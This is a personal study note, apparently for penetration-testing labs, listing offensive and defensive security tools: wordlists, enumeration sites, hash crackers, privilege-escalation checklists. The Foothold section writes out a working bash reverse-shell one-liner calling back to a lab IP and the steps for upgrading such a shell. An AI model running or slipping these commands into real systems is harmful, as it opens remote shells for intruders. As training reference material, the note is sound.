#MOC

# Cyber Security Tools

**Lists**: [Auto_Wordlists](https://github.com/carlospolop/Auto_Wordlists), [SecLists](https://github.com/danielmiessler/SecLists) (which contains the famous rockyou list of 14+ million actual passwords), [common passwords](https://cybernews.com/best-password-managers/most-common-passwords/). For directory busting SecLists has the `big.txt` list under Web Content (on Kali as `/usr/share/wordlists/dirb/big.txt`). On Kali run `wordlists` to get a list of preinstalled lists (generally in `/usr/share/wordlists/`). On Parrot preinstalled lists are stored in `/opt/useful/`. ^1p1bli

**Wikis**: [Hacktricks](https://book.hacktricks.wiki), [PayloadsAllTheThings](https://swisskyrepo.github.io/PayloadsAllTheThings/)

**Exploit search engines**: [Exploit Database](https://www.exploit-db.com/), [CVE](https://www.cve.org)

![[Cyber Security#^v2o1pe]]

## Offensive

The [[Metasploit Framework]] can be used for all offensive tasks.

### Enumeration (Reconnaissance)

![[Computer Networking#^0dtvb9]]

This [wiki](https://github.com/H3r1CH/penetration-testing/tree/main/pentesting-network) provides a nice breakdown of common ports, as does [HackTricks](https://book.hacktricks.wiki/en/network-services-pentesting).

If you don't have access to [[Nmap]], the following sites provide **online Nmap alternatives**: [CanYouSeeMe](https://canyouseeme.org), [Shields Up!](https://www.grc.com/x/ne.dll?bh0bkyd2), [Pentest Tools](https://pentest-tools.com/).

For **subdomain enumeration** use [[gobuster]] and [DNSdumpster](https://dnsdumpster.com/). To gather information about registered subdomains and for a more thorough DNS lookup use

For **directory busting** use [[gobuster]].

To **discover a web site's tech stack** use [Wappalyzer](https://www.wappalyzer.com/) and [Builtwith](https://builtwith.com/).

![[Crocodile Write-up#^08ckfy]] ^pwgwey

![[Linux#^p4xt6p]]

![[Linux#^lqkkxm]]

### Foothold

[[Responder]] can be used **to capture NTLM hashes** by setting up fake servers.

**Hash crackers**: [[John the Ripper]], [[Hashcat]]; [CrackStation](https://crackstation.net) is an online tool.

**Hash tools:** [[hashID]] identifies the hash type; [[mkpasswd]] can be used to generate hashes.

**Online password/login cracker:** [[Hydra]]

**Reverse shell** cheatsheets: [PayloadsAllTheThings](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-reverse-cheatsheet/), [Reverse Shell Generator](https://www.revshells.com), [webshells](https://github.com/BlackArch/webshells)

Here's an example of a common reverse shell command: `bash -i >& /dev/tcp/10.10.14.91/4242 0>&1`. If it does not work, you can wrap it in a `bash -c`:

```sh
bash -c "bash -i >& /dev/tcp/10.10.14.91/4242 0>&1"
```

To get a fully functional shell do the following:[^1]

```
python3 -c 'import pty;pty.spawn("/bin/bash")'
CTRL+Z
stty raw -echo; fg
export TERM=xterm-256color
```

If the above does not work because Python is not installed, try the following instead:

```sh
script /dev/null -c bash
```

[^1]: The original solution used to put `fg` in a separate command, which fails on Kali due to mangled carriage returns leading to `^M` in the output. After [further research](https://security.stackexchange.com/questions/251326/upgrading-a-reverse-shell-with-stty-raw-echo-doesnt-work) it turns out that's because Kali switched to `zsh`. To fix it, simply call `fg` on the same line. The same article also suggests `export TERM=xterm-256color` instead of `TERM=xterm`. Another fix is to install `rlwrap` (`sudo apt install rlwrap`) and then call `nc` on Kali with `rlwrap nc ...`.

**SQL injection:** [[sqlmap]]

### Privilege Escalation

[[PEASS]] will provide loads of useful info.

Make a habit of checking `sudo -l`, which lists the programs the current user can execute as root. You will require the current user's password. Cross-reference that list with [GTFOBins](https://gtfobins.github.io).

When looking for clear-text passwords, don't forget to check `/var/www`.

![[Linux#^e2xlsy]]

If `lxd` is running, check `groups` to see if the current user is a member of the `lxd` group. See [[Included Write-up]] for an example. For more info see this [article](https://www.hackingarticles.in/lxd-privilege-escalation/) and this [HackTricks article](https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/interesting-groups-linux-pe/lxd-privilege-escalation.html).

HackTricks has nice checklists for [Linux](https://book.hacktricks.wiki/en/linux-hardening/linux-privilege-escalation-checklist.html), [Windows](https://book.hacktricks.wiki/en/windows-hardening/checklist-windows-privilege-escalation.html), and [macOS](https://book.hacktricks.wiki/en/macos-hardening/macos-security-and-privilege-escalation/index.html), along with corresponding guides.

## Defensive

[Canary Tools](https://www.canarytokens.org) will allow you to create **honey pots**.

[DNSLeakTest](https://dnsleaktest.com/) can be used to test for **DNS leaks**.

## General

![[Computer Networking#Networking Tools]]

**Protocols:** [[SMB]], [[FTP]], [[Telnet]], [[RDP]], [[WinRM]], [[SSH]]

[[Impacket]] provides example scripts for accessing many commonly used protocols.

**File transfer tools:** [[Rclone]], [[Rsync]], [[SMB]], [[FTP]], [[Python Web Server]]

If Python is not available, a web server can also be started with PHP and Ruby like so:

```sh
php -S 0.0.0.0:8000
ruby -run -ehttpd . -p8000
```

**Databases:** [[Redis]], [[MongoDB]], [[MySQL]], [[PostgreSQL]], [[Microsoft SQL Server]]

**Cloud:** [[AWS CLI]]

**Accessing web services:** [[cURL]], [[wget]], [[xh]]; [Burp Suite](https://portswigger.net/burp/communitydownload) will allow you to intercept and modify web requests via its proxy.